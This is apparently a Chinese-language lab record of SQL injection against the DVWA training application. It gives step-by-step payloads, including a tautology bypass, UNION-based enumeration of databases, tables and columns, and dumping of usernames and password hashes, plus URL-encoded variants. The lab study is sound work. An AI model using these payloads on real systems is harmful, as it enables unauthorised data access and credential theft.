# SQL 注入 Payload 实验记录
# 实验环境：DVWA + Burp Suite
# 数据库：MySQL / MariaDB
# 安全等级：Low

==================================================
1. 基础 SQL 注入
==================================================

1' OR '1'='1

作用：
绕过 WHERE 条件限制，读取所有用户信息。

原理：
利用 OR 条件恒成立：
'1'='1'

预期结果：
返回数据库中的所有用户记录。

--------------------------------------------------

==================================================
2. 判断字段数
==================================================

1' ORDER BY 1#
1' ORDER BY 2#
1' ORDER BY 3#

作用：
判断当前 SQL 查询语句中的字段数量。

原理：
逐步增加 ORDER BY 后面的数字，
直到数据库报错。

实验结果：
字段数 = 2

--------------------------------------------------

==================================================
3. UNION 联合查询测试
==================================================

1' UNION SELECT 1,2#

作用：
测试 UNION SELECT 是否能够成功执行。

预期结果：
页面显示：

First name: 1
Surname: 2

说明：
UNION 注入成功，
两个字段均存在回显。

--------------------------------------------------

==================================================
4. 获取数据库信息
==================================================

1' UNION SELECT database(),user()#

作用：
获取：

- 当前数据库名称
- 当前数据库用户

--------------------------------------------------

==================================================
5. 获取数据库版本
==================================================

1' UNION SELECT version(),2#

作用：
获取当前数据库版本信息。

预期结果：
返回 MariaDB / MySQL 版本号。

--------------------------------------------------

==================================================
6. 获取操作系统信息
==================================================

1' UNION SELECT @@version_compile_os,2#

作用：
获取数据库服务器操作系统信息。

--------------------------------------------------

==================================================
7. 爆表
==================================================

1' UNION SELECT table_name,2 FROM information_schema.tables#

作用：
读取数据库中的所有表名。

说明：
information_schema.tables
用于存储数据库表信息。

--------------------------------------------------

==================================================
8. 爆字段
==================================================

1' UNION SELECT column_name,2 FROM information_schema.columns#

作用：
读取数据库中的字段名称。

说明：
information_schema.columns
用于存储数据库字段信息。

--------------------------------------------------

==================================================
9. 读取账号密码
==================================================

1' UNION SELECT user,password FROM users#

作用：
读取 users 表中的：

- 用户名
- 密码 Hash

说明：
攻击者可进一步进行密码破解。

--------------------------------------------------

==================================================
10. URL 编码 Payload
==================================================

1%27%20OR%20%271%27=%271

1%27%20ORDER%20BY%201%23

1%27%20UNION%20SELECT%20version(),2%23

作用：
Burp Suite 抓包过程中使用的 URL 编码 Payload。

说明：

常见 URL 编码：

空格 -> %20
'    -> %27
#    -> %23

--------------------------------------------------